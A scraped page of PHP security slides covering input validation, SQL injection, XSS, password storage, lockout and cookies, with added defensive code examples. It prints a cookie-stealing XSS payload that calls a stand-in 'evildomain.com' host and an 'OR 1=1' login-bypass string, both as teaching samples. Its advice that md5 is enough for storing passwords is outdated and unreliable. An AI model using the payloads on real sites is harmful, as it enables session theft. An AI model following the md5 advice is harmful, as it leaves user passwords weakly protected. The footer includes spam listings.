PHP SECURITY

What Is Security?

Security is a measurement, not a characteristic.

www.mindfiresolutions.com | www.twitter.com/mindfires | http://wikipedia.org/wiki/mindfire_solutions

Consequently, PHP applications often end up working with sensitive data.
a. Unauthorized access to this data is unacceptable.
b. To prevent problems, a secure design is needed.

Basic Steps

1. Input fields must be sanitized before being used

One of the key concepts you must accept is that user input is unreliable and not to be trusted. It may be:
- Partially lost in transmission between server and client.
- Corrupted by some in-between process.
- Modified by a malicious user in an unexpected manner.
- An intentional attempt to gain unauthorized access or to crash the application.

There are many ways to sanitize data. One can use PHP's built-in functions for sanitization or custom-defined functions.

E.g.: All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous.

    // Cast the id to an integer; fall back to 0 when it is missing or empty
    if (!empty($_GET['id'])) {
        $id = (int) $_GET['id'];
    } else {
        $id = 0;
    }

PHP also comes with the ctype extension, which offers a very quick mechanism for validating string content.

    // ctype_* functions return false for an empty string or any non-matching character
    if (!ctype_alnum($_GET['login'])) {
        echo "Only A-Za-z0-9 are allowed.";
    }
    if (!ctype_alpha($_GET['captcha'])) {
        echo "Only A-Za-z are allowed.";
    }

You can also use your own customized validation, like:

    function validateEmail($email) {
        if ($email == "") {
            return false;
        }
        // Local part, "@", one or more dot-terminated domain labels, then a 2-4 letter TLD
        if (!preg_match('/^[-a-z0-9_.]+@([-a-z0-9]+\.)+[a-z]{2,4}$/i', $email)) {
            return false;
        }
        return true;
    }

2. Data Validations

As we all know, there are two types of validation for a web application:
a. Client-side validation
b. Server-side validation

Client-side validation is not reliable, as an attacker can always bypass it or shut off the client-side script routines, for example by disabling JavaScript. Hence server-side validation is a must from the security point of view, even if client-side validation exists.

3. Accessing Input Data

There is a series of super-globals which offer very simple access to the input data: $_GET, $_POST, $_SERVER, $_REQUEST.

Using GET to send sensitive data causes a security violation. When sensitive data is to be passed to the server, do not send it as a parameter in the query string, as in: http://sitename/check_valid.php?cardnumber=1234567890123456. This is not appropriate because the entire URL may be stored by the browser in its history, potentially exposing the sensitive information to someone else using the same machine later.

The POST method uses the HTTP body to pass information, and this is good in this case because the HTTP body is not logged. However, using POST alone doesn't offer enough protection. The data's confidentiality and integrity are still at risk because the information is still sent in clear text. So the use of an encryption technique is required, using SSL. Data is stored and accessed securely.

4. Escaping Output

Output is anything that leaves your application, bound for a client. The client, in this case, is anything from a Web browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands.

To escape output intended for a Web browser, PHP provides htmlspecialchars() and htmlentities(). E.g.:

    $_POST['data'] = "<script>alert('Security issues');</script>";
    $var = $_POST['data'];
    // Undo magic-quotes escaping where it exists (the feature was removed in
    // PHP 5.4 and get_magic_quotes_gpc() itself in PHP 8.0)
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $var = stripslashes($var);
    }
    echo htmlentities($var);

5. Register Globals

The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. Turning register_globals on is a security risk. Therefore, one should always develop and deploy applications with register_globals disabled.

Why is it a security risk? Consider the following block of code:

    <?php
    if (authenticated_user()) {
        $authorized = true;
    }
    // $authorized is never initialized when authentication fails
    if ($authorized) {
        include '/highly/sensitive/data.php';
    }
    ?>

Since $authorized is left uninitialized if user authentication fails, an attacker could access privileged data by simply passing the value via GET:

    http://example.com/script.php?authorized=1

Solutions:
- Disable register_globals in php.ini. This is already done by default as of PHP 4.2.0.
- Code with error_reporting set to E_ALL. This allows you to see warnings about the use of uninitialized variables.
- Use type-sensitive validation conditions. Because input is always a string, a type-sensitive comparison to a Boolean or an integer will always fail.

A best practice is to initialize all variables. With error_reporting set to E_ALL, the use of an uninitialized variable won't be overlooked during development.

6. Error Reporting

During development, turning error reporting on is good practice.

    ini_set('error_reporting', E_ALL);

However, when you put your site into production, this level of detail can be dangerous. You can't foresee all errors during development; your program could run out of memory or disk space, for example. So, for safety's sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your directory root; this way, the public can't see if anything goes wrong.

    error_reporting(E_ALL ^ E_NOTICE);   // This is a 'sensible' reporting level
    ini_set('display_errors', 0);        // Hide all error messages from the public
    ini_set('log_errors', 1);
    ini_set('error_log', 'path/to_your/log.txt'); /* Preferably a location outside of your web root */

7. SQL Injection

SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database.

One of the most common vulnerabilities is when logging in to a site. Take this example:

    $username = $_POST['username'];
    $password = $_POST['password'];
    // Vulnerable: user input is placed directly into the SQL text
    $result = mysql_query("SELECT * FROM site_users WHERE username = '$username' AND password = '$password'");
    if (mysql_num_rows($result) > 0) {
        // logged in
    }

If the attacker enters a valid username, "rob", in the username field and the following in the password field:

    ' OR 1=1 '

the resulting query will look like this:

    SELECT * FROM site_users WHERE username = 'rob' AND password = '' OR 1=1

Since the last criterion will always be true, the user will be able to log in as rob without knowing rob's password.

Preventing SQL injection: The best way of cleaning input is using PHP's built-in mysql_real_escape_string() function; this will escape characters such as ', " and others. Check whether magic quotes is on or off to avoid double escaping.

    function check_sql_injection($var) {
        // Undo magic-quotes escaping first so the value is not escaped twice
        if (get_magic_quotes_gpc()) {
            $var = stripslashes($var);
        }
        $var = mysql_real_escape_string($var);
        return $var;
    }

Now this customized function can be used in an SQL query to prevent SQL injection:

    $username = check_sql_injection($_POST['username']);
    $password = check_sql_injection($_POST['password']);
    $result = mysql_query("SELECT * FROM site_users WHERE username = '$username' AND password = '$password'");
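
An added example, not from the original slides: the same login lookup written with a PDO prepared statement, so the username is sent as a bound parameter instead of being escaped into the SQL text (the mysql_* functions used above were removed in PHP 7.0). It assumes PHP 7.4+ with the pdo_sqlite driver; the in-memory database, the password_hash column, the function names and the sample rows are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the slide's site_users table (in-memory SQLite).
function makeDemoDatabase(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE site_users (
        username      TEXT PRIMARY KEY,
        password_hash TEXT NOT NULL
    )');
    $insert = $pdo->prepare(
        'INSERT INTO site_users (username, password_hash) VALUES (:u, :h)'
    );
    $insert->execute([
        ':u' => 'rob',
        ':h' => password_hash('constructed-sample-password', PASSWORD_DEFAULT),
    ]);
    return $pdo;
}

function login(PDO $pdo, string $username, string $password): bool
{
    // The SQL text is fixed; the driver passes $username separately as data,
    // so quotes or SQL keywords inside it cannot change the statement.
    $stmt = $pdo->prepare(
        'SELECT password_hash FROM site_users WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $hash = $stmt->fetchColumn();

    if ($hash === false) {
        return false; // no such user
    }
    // The password never enters the query; it is checked against the stored hash.
    return password_verify($password, (string) $hash);
}

$pdo = makeDemoDatabase();

// Constructed attempts: a valid login, the password-field value from the
// slide, and an ordinary name that happens to contain an apostrophe.
$attempts = [
    ['rob', 'constructed-sample-password'],
    ['rob', "' OR 1=1 '"],
    ["o'brien", 'anything'],
];

foreach ($attempts as [$user, $pass]) {
    $outcome = login($pdo, $user, $pass) ? 'accepted' : 'rejected';
    printf("%-10s %-30s => %s\n", $user, $pass, $outcome);
}
```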

8. XSS

XSS stands for "Cross Site Scripting", and refers to the act of inserting content, such as JavaScript, into a page. Usually these attacks are used to steal cookies, which often contain sensitive data such as login information. E.g.:

    $id = $_GET['id'];
    // Vulnerable: $id is echoed without escaping
    echo 'Displaying news item number ' . $id;

An attacker could pass a string like this:

    <script>window.location.href = "http://evildomain.com/cookie-stealer.php?c=' + document.cookie;</script>

If an attacker passed this simple JavaScript into the $_GET['id'] variable and convinced a user to click it, then the script would be executed and pass the user's cookie data on to the attacker, allowing them to log in as the user. It's really that simple.

Prevent XSS attacks?

This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. The easiest way to do this is with PHP's built-in strip_tags() function, which will remove HTML from a string, rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to &lt; and &gt; respectively.
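
An added example, not from the original slides: it runs a few inputs through strip_tags() and through an escaping helper, to show that strip_tags() can delete ordinary text and leaves quote characters alone, while escaping keeps every character and encodes quotes for attribute values. The helper names e() and renderNewsLine() and the sample inputs are constructed; PHP 7.4+ is assumed.

```php
<?php
declare(strict_types=1);

// Escape a value for HTML text nodes and quoted attribute values.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render the news line from the XSS slide. The id is numeric, so it is
// validated as a positive integer first and escaped on output regardless.
function renderNewsLine(string $rawId): string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 'Unknown news item: ' . e($rawId);
    }
    return 'Displaying news item number ' . e((string) $id);
}

// Constructed inputs; the script string is the one used on the
// "Escaping Output" slide.
$inputs = [
    '42',
    "<script>alert('Security issues');</script>",
    'if a<b and c>d',
    'Tom "T" O\'Neil',
];

foreach ($inputs as $raw) {
    echo 'input:      ', $raw, PHP_EOL;
    echo 'news line:  ', renderNewsLine($raw), PHP_EOL;

    // strip_tags() removes anything shaped like a tag, which includes
    // ordinary text between "<" and ">", and does not touch quotes.
    echo 'strip_tags: ', strip_tags($raw), PHP_EOL;

    // Escaping keeps every character and makes it inert as HTML text.
    echo 'escaped:    ', e($raw), PHP_EOL;

    // Inside a quoted attribute the quote characters must be encoded as
    // well, which is why e() passes ENT_QUOTES.
    echo 'attribute:  <input name="q" value="', e($raw), '">', PHP_EOL, PHP_EOL;
}
```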

9. Passwords need to be stored securely.

Secure information, such as passwords and credit card numbers, should be stored in an encrypted format. This can be achieved using the md5 command or any stronger algorithm. By using this, the attacker won't be able to access the password of a user.

10. Lockout functionality must be there for the login functionality.

An attacker may continue to brute force the login functions until successful. To prevent this, after a given number of unsuccessful logins over a period of time, the IP/User should be blocked or locked out for a given period of time. For example, 5 unsuccessful logins in 5 minutes may call for a lockout of 30 minutes for that IP/User.
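
An added example, not from the original slides: a lockout counter using the slide's thresholds (5 failures in 5 minutes, 30 minute lockout) for both the user name and the IP address, with the password stored through password_hash(), one of the stronger methods the slide allows for. The class and function names, the in-memory storage, the fixed clock and the sample account are constructed; a real deployment would keep the counters in a shared store. PHP 7.4+ is assumed.

```php
<?php
declare(strict_types=1);

// Thresholds from the slide: 5 failures within 5 minutes -> 30 minute lockout.
final class LoginThrottle
{
    private const MAX_FAILURES   = 5;
    private const WINDOW_SECONDS = 5 * 60;
    private const LOCK_SECONDS   = 30 * 60;

    /** @var array<string, int[]> failure timestamps per key */
    private array $failures = [];
    /** @var array<string, int> unlock time per key */
    private array $lockedUntil = [];

    public function isLocked(string $key, int $now): bool
    {
        return ($this->lockedUntil[$key] ?? 0) > $now;
    }

    public function recordFailure(string $key, int $now): void
    {
        // Keep only the failures that are still inside the sliding window.
        $recent = array_values(array_filter(
            $this->failures[$key] ?? [],
            static fn (int $t): bool => $t > $now - self::WINDOW_SECONDS
        ));
        $recent[] = $now;

        if (count($recent) >= self::MAX_FAILURES) {
            $this->lockedUntil[$key] = $now + self::LOCK_SECONDS;
            $recent = [];
        }
        $this->failures[$key] = $recent;
    }

    public function clear(string $key): void
    {
        unset($this->failures[$key]);
    }
}

// Returns 'ok', 'denied' or 'locked'.
// $users maps username => password_hash() output.
function attemptLogin(LoginThrottle $throttle, array $users, string $user,
                      string $ip, string $password, int $now): string
{
    $keys = ["user:$user", "ip:$ip"]; // the slide locks out by "IP/User"
    foreach ($keys as $key) {
        if ($throttle->isLocked($key, $now)) {
            return 'locked'; // refuse before the password is even checked
        }
    }
    if (isset($users[$user]) && password_verify($password, $users[$user])) {
        $throttle->clear("user:$user"); // the IP history is kept on purpose
        return 'ok';
    }
    foreach ($keys as $key) {
        $throttle->recordFailure($key, $now);
    }
    return 'denied';
}

// Constructed data: one account, stored as a salted, deliberately slow hash.
$users    = ['rob' => password_hash('constructed-sample-password', PASSWORD_DEFAULT)];
$throttle = new LoginThrottle();
$start    = 1700000000;    // fixed clock so the run is repeatable
$ip       = '203.0.113.7'; // documentation address range

// Six wrong guesses 30 seconds apart, then the right password while the
// lockout is active, then the right password after it has expired.
for ($i = 0; $i < 6; $i++) {
    $t = $start + 30 * $i;
    echo '+', $t - $start, 's wrong password:   ',
        attemptLogin($throttle, $users, 'rob', $ip, 'guess' . $i, $t), PHP_EOL;
}
echo '+200s correct password:  ',
    attemptLogin($throttle, $users, 'rob', $ip, 'constructed-sample-password', $start + 200), PHP_EOL;
echo '+1921s correct password: ',
    attemptLogin($throttle, $users, 'rob', $ip, 'constructed-sample-password', $start + 1921), PHP_EOL;
```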

11. Email forms are vulnerable to email header injection

Input should be validated and checked so that email header injection cannot occur. Escaping the CR and LF characters is needed, as is using a captcha during mail form submission.
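
An added example, not from the original slides: a contact-form check that refuses any header-bound field containing CR, LF or another control character before the values are handed to mail(). The function names, form field names, example.com addresses and sample submissions are constructed; PHP 7.4+ is assumed.

```php
<?php
declare(strict_types=1);

// Returns the value unchanged if it is safe to place in a mail header,
// or null if it contains CR, LF or any other control character.
function headerSafe(string $value): ?string
{
    return preg_match('/[\x00-\x1F\x7F]/', $value) === 1 ? null : $value;
}

// Reads one form field as a string; arrays and missing fields become ''.
function formField(array $form, string $name): string
{
    return isset($form[$name]) && is_string($form[$name]) ? $form[$name] : '';
}

// Validates a submission and returns either the arguments for mail()
// or the list of rejected fields. Nothing is sent here.
function buildContactMail(array $form): array
{
    $errors = [];

    $email = formField($form, 'email');
    if (headerSafe($email) === null
        || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email';
    }

    $subject = formField($form, 'subject');
    if (headerSafe($subject) === null || trim($subject) === '') {
        $errors[] = 'subject';
    }

    if ($errors !== []) {
        return ['ok' => false, 'errors' => $errors];
    }

    return [
        'ok'      => true,
        'to'      => 'contact@example.com',
        'subject' => trim($subject),
        // The body is not a header, so line breaks are allowed in it.
        'body'    => formField($form, 'message'),
        // The user's address goes in Reply-To only; From stays fixed.
        'headers' => ['From' => 'noreply@example.com', 'Reply-To' => $email],
    ];
}

// Constructed submissions: one clean, two carrying a line break in a
// field that would end up in a header.
$submissions = [
    'clean'            => ['email' => 'alice@example.com', 'subject' => 'Hello',
                           'message' => "Line one\nLine two"],
    'CRLF in subject'  => ['email' => 'alice@example.com',
                           'subject' => "Hello\r\nX-Injected: 1", 'message' => 'Hi'],
    'CRLF in address'  => ['email' => "alice@example.com\r\nX-Injected: 1",
                           'subject' => 'Hello', 'message' => 'Hi'],
];

foreach ($submissions as $label => $form) {
    echo $label, ': ', json_encode(buildContactMail($form)), PHP_EOL;
}
```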

12. Using Cookies Securely

Cookies are an easy and useful way to keep user-specific information available. However, because cookies are sent to the browser's computer, they are vulnerable to spoofing or other malicious use. Follow these guidelines:
- Do not store any critical information in cookies. For example, do not store a user's password in a cookie, even temporarily. As a rule, do not store any sensitive information in a cookie.
- Set expiration dates on cookies to the shortest practical time you can. Avoid permanent cookies if possible.
- Consider encrypting information in cookies.
- Consider setting the Secure and HttpOnly properties on your cookies to true.

Mindfire Solutions Expertise in PHP

For further queries contact us or call 1-248-686-1424
www.mindfiresolutions.com

Weitere ähnliche Inhalte

Was ist angesagt?

Php Using Arrays
Php Using ArraysPhp Using Arrays
Php Using Arraysmussawir20
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response StructureBhagyashreeGajera1
 
Password cracking and brute force tools
Password cracking and brute force toolsPassword cracking and brute force tools
Password cracking and brute force toolszeus7856
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentationMahmoud Ibra
 
Network programming in java - PPT
Network programming in java - PPTNetwork programming in java - PPT
Network programming in java - PPTkamal kotecha
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
Form Processing In Php
Form Processing In PhpForm Processing In Php
Form Processing In PhpHarit Kothari
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
jstl ( jsp standard tag library )
jstl ( jsp standard tag library )jstl ( jsp standard tag library )
jstl ( jsp standard tag library )Adarsh Patel
 
Java rmi example program with code
Java rmi example program with codeJava rmi example program with code
Java rmi example program with codekamal kotecha
 
Sessions and cookies in php
Sessions and cookies in phpSessions and cookies in php
Sessions and cookies in phpPavan b
 
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?ITpreneurs
 
Flask Introduction - Python Meetup
Flask Introduction - Python MeetupFlask Introduction - Python Meetup
Flask Introduction - Python MeetupAreski Belaid
 

Was ist angesagt? (20)

Php Using Arrays
Php Using ArraysPhp Using Arrays
Php Using Arrays
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response Structure
 
Password cracking and brute force tools
Password cracking and brute force toolsPassword cracking and brute force tools
Password cracking and brute force tools
 
Php with MYSQL Database
Php with MYSQL DatabasePhp with MYSQL Database
Php with MYSQL Database
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentation
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Network programming in java - PPT
Network programming in java - PPTNetwork programming in java - PPT
Network programming in java - PPT
 
Event handling
Event handlingEvent handling
Event handling
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Form Processing In Php
Form Processing In PhpForm Processing In Php
Form Processing In Php
 
Lesson 2 php data types
Lesson 2   php data typesLesson 2   php data types
Lesson 2 php data types
 
Flask – Python
Flask – PythonFlask – Python
Flask – Python
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
jstl ( jsp standard tag library )
jstl ( jsp standard tag library )jstl ( jsp standard tag library )
jstl ( jsp standard tag library )
 
Java rmi example program with code
Java rmi example program with codeJava rmi example program with code
Java rmi example program with code
 
Sessions and cookies in php
Sessions and cookies in phpSessions and cookies in php
Sessions and cookies in php
 
PHP - Introduction to PHP Fundamentals
PHP -  Introduction to PHP FundamentalsPHP -  Introduction to PHP Fundamentals
PHP - Introduction to PHP Fundamentals
 
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
 
Servlets
ServletsServlets
Servlets
 
Flask Introduction - Python Meetup
Flask Introduction - Python MeetupFlask Introduction - Python Meetup
Flask Introduction - Python Meetup
 

Ähnlich wie PHP Security

Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Website Security
Website SecurityWebsite Security
Website SecurityCarlos Z
 
Website Security
Website SecurityWebsite Security
Website SecurityMODxpo
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007Aung Khant
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
Php Security3895
Php Security3895Php Security3895
Php Security3895Aung Khant
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 

Ähnlich wie PHP Security (20)

Web application security
Web application securityWeb application security
Web application security
 
Website Security
Website SecurityWebsite Security
Website Security
 
Website Security
Website SecurityWebsite Security
Website Security
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
Php Security3895
Php Security3895Php Security3895
Php Security3895
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
Php security
Php securityPhp security
Php security
 
Php security3895
Php security3895Php security3895
Php security3895
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
secure php
secure phpsecure php
secure php
 
Download It
Download ItDownload It
Download It
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
 
Web Security
Web SecurityWeb Security
Web Security
 
&lt;img src="xss.com">
&lt;img src="xss.com">&lt;img src="xss.com">
&lt;img src="xss.com">
 
Fav
FavFav
Fav
 

Mehr von Mindfire Solutions (20)

Physician Search and Review
Physician Search and ReviewPhysician Search and Review
Physician Search and Review
 
diet management app
diet management appdiet management app
diet management app
 
Business Technology Solution
Business Technology SolutionBusiness Technology Solution
Business Technology Solution
 
Remote Health Monitoring
Remote Health MonitoringRemote Health Monitoring
Remote Health Monitoring
 
Influencer Marketing Solution
Influencer Marketing SolutionInfluencer Marketing Solution
Influencer Marketing Solution
 
ELMAH
ELMAHELMAH
ELMAH
 
High Availability of Azure Applications
High Availability of Azure ApplicationsHigh Availability of Azure Applications
High Availability of Azure Applications
 
IOT Hands On
IOT Hands OnIOT Hands On
IOT Hands On
 
Glimpse of Loops Vs Set
Glimpse of Loops Vs SetGlimpse of Loops Vs Set
Glimpse of Loops Vs Set
 
Oracle Sql Developer-Getting Started
Oracle Sql Developer-Getting StartedOracle Sql Developer-Getting Started
Oracle Sql Developer-Getting Started
 
Adaptive Layout In iOS 8
Adaptive Layout In iOS 8Adaptive Layout In iOS 8
Adaptive Layout In iOS 8
 
Introduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/MacIntroduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/Mac
 
LINQPad - utility Tool
LINQPad - utility ToolLINQPad - utility Tool
LINQPad - utility Tool
 
Get started with watch kit development
Get started with watch kit developmentGet started with watch kit development
Get started with watch kit development
 
Swift vs Objective-C
Swift vs Objective-CSwift vs Objective-C
Swift vs Objective-C
 
Material Design in Android
Material Design in AndroidMaterial Design in Android
Material Design in Android
 
Introduction to OData
Introduction to ODataIntroduction to OData
Introduction to OData
 
Ext js Part 2- MVC
Ext js Part 2- MVCExt js Part 2- MVC
Ext js Part 2- MVC
 
ExtJs Basic Part-1
ExtJs Basic Part-1ExtJs Basic Part-1
ExtJs Basic Part-1
 
Spring Security Introduction
Spring Security IntroductionSpring Security Introduction
Spring Security Introduction
 

Kürzlich hochgeladen

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 

Kürzlich hochgeladen (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
08448380779 Call Girls In Friends Colony Women Seeking Men
